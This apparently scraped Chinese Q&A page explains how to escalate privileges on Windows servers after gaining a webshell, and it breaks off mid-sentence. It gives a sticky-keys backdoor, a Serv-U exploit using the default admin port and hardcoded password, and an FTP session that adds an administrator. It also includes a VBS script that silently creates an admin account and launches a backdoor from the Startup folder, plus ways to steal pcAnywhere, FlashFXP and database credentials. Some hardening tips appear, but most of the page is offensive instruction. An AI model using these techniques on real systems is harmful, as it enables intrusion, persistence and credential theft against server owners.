pcanywhere提权提权工具是什么意思？

pcanywhere提权时间:2021-10-01 阅读:()

得到webshell后怎么提权，有没有人会啊？

如果能对系统目录进行操作的话，把system32目录下的sethc.exe删除，再把cmd.exe重命名为sethc.exe，远程登陆，在登陆界面按五下shift，出了cmd自己加个管理员把。

【说白了粘滞键后门】

srevu是怎么提权?

漏洞是使用Serv-u本地默认管理端口，以默认管理员登陆新建域和用户来执行命令，Serv-u>3.x版本默认本地管理端口是：43958，默认管理员：LocalAdministrator，默认密码：#l@$ak#.lk;0@P，这是集成在Serv-u内部的，可以以Guest权限来进行连接，对Serv-u进行管理。

防止办法和对策：一般防止方法：设置目录权限，通过去掉Web目录iusr用户的执行权限来防止使用Webshell来运行Exp程序。

对策：这种方法有一定的局限性，需要设置的目录很多，不能有一点疏漏，比如我就发现很多虚拟主机在C:Documents and SettingsAll Users Documents目录以及下边几个子目录Documents没有设置权限，导致可以在这个目录上传并运行Exp，这种目录还有x:php,x:perl等，因为这种目录都是everyone完全控制的。

有些主机还支持php,pl,aspx等，这简直就是服务器的Serv-U灾难，运行程序更加方便。

高级一点的防止办法：修改Serv-u管理端口，用Ultraedit打开ServUDaemon.exe查找B6AB(43958的16进制)，替换成自己定义的端口比如3930（12345），打开ServUAdmin.exe找到最后一个B6AB替换成3930（12345）,启动Serv-u，现在本地管理端口就成了12345了： TCP 127.0.0.1:12345 0.0.0.0:0 LISTENING 对策：对付这种也很简单stat –an,就能看到端口了，有人stat无法运行，其实你再上传stat.exe到可执行目录运行就ok了，然后修改一下Exp编译，上传运行就好了，我修改了一个可以自定义端口的Exp,运行格式： USAGE: serv-u.exe port &mand" Example: serv-u.exe 43958 & user xl xiaoxue /add" 更高级的防止办法：修改管理员名和密码，用Ultraedit打开ServUDaemon.exe查找Ascii：LocalAdministrator，和#l@$ak#.lk;0@P，修改成等长度的其它字符就可以了，ServUAdmin.exe也一样处理。

对策：这下默认的管理员连接不上了，还有办法么？嘿嘿，有的管理员安装Serv-u都是使用默认目录C:Program FilesServ-U安装，这个目录虽然不能写，也不能修改，但是默认iusr是可以读的，我们可以用webshell来下载ServUDaemon.exe，用Ultraedit打开分析一下，Serv-U的帐号密码就到手了，修改Exp编译上传运行，我们又胜利了。

终极防御： 1.设置好目录权限，不要疏忽大意； 2.Serv-U最好不要使用默认安装路径，设置Serv-U目录的权限，只有管理员才能访问； 3.用我介绍的办法修改Serv-U的默认管理员名字和密码，喜欢的话端口也可以改掉。

拿到WEBSHELL如何提权~

说到花了九牛二虎的力气获得了一个webshell，当然还想继续获得整个服务器的admin权限，正如不想得到admin的不是好黑客～嘻嘻～～好跟我来，看看有什么可以利用的来提升权限第一如果服务器上有装了pcanywhere服务端，管理员为了管理方便也给了我们方便，到系统盘的Documents and Settings/All Us ers/Application Data/Symantec/pcAnywhere/中下载*.cif本地破解就使用pcanywhere连接就ok了第二有很多小黑问我这么把webshell的iis user权限提升一般服务器的管理都是本机设计完毕然后上传到空间里，那么就会用到ftp，服务器使用最多的就是servu 那么我们就利用servu来提升权限通过servu提升权限需要servu安装目录可写～好开始把，首先通过webshell访问servu安装文件夹下的ServUDaemon.ini把他下载下来，然后在本机上安装一个servu把ServUDaemon.ini放到本地安装文件夹下覆盖，启动servu添加了一个用户，设置为系统管理员，目录C:，具有可执行权限然后去servu安装目录里把ServUDaemon.ini更换服务器上的。

用我新建的用户和密码连接～好的，还是连上了 ftp ftp>open ip Connected to ip. 220 Serv-U FTP Server v5.0.0.4 for WinSock ready... User (ip:(none)): id //刚才添加的用户 331 User name okay, please plete E-mail address as password. Password:password //密码 230 User logged in, proceed. ftp> cd winnt //进入win2k的winnt目录 250 Directory changed to /WINNT ftp>cd system32 //进入system32目录 250 Directory changed to /WINNT/system32 ftp>quote site .exe user rover rover1234 /add //利用系统.exe 文件加用户。

如果提示没有权限，那我们就把后门（server.exe）传他system32目录然后写一个VBs教本 set wshshell=createobject ("wscript.shell") a=wshshell.run ("cmd.exe / user user pass /add",0) b=wshshell.run ("cmd.exe / localgroup Administrators user /add",0) b=wshshell.run ("cmd.exe /c server.exe",0) 存为xx.vbe 这个教本的作用是建立user用户密码为pass 并且提升为管理员然后执行system32目录下的server.exe 把这个教本传他 C:Documents and SettingsAll Users「开始」菜单程序启动目录这样管理员只要一登陆就会执行那个教本. 接下来就是等了.等他登陆. 第三就是先检查有什么系统服务，或者随系统启动自动启动的程序和管理员经常使用的软件，比如诺顿，VAdministrator，金山，瑞星,WinRAR甚至QQ之类的，是否可以写，如果可以就修改其程序，绑定一个批处理或者VBS，然后还是等待服务器重启。

第四查找conn和config ,pass这类型的文件看能否得到sa或者mysql的相关密码，可能会有所收获等等。

第五使用Flashfxp也能提升权限，但是成功率就看你自己的运气了首先找到FlashFXP文件夹，打开(编辑)Sites. dat，这个文件这是什么东西密码和用户名，而且密码是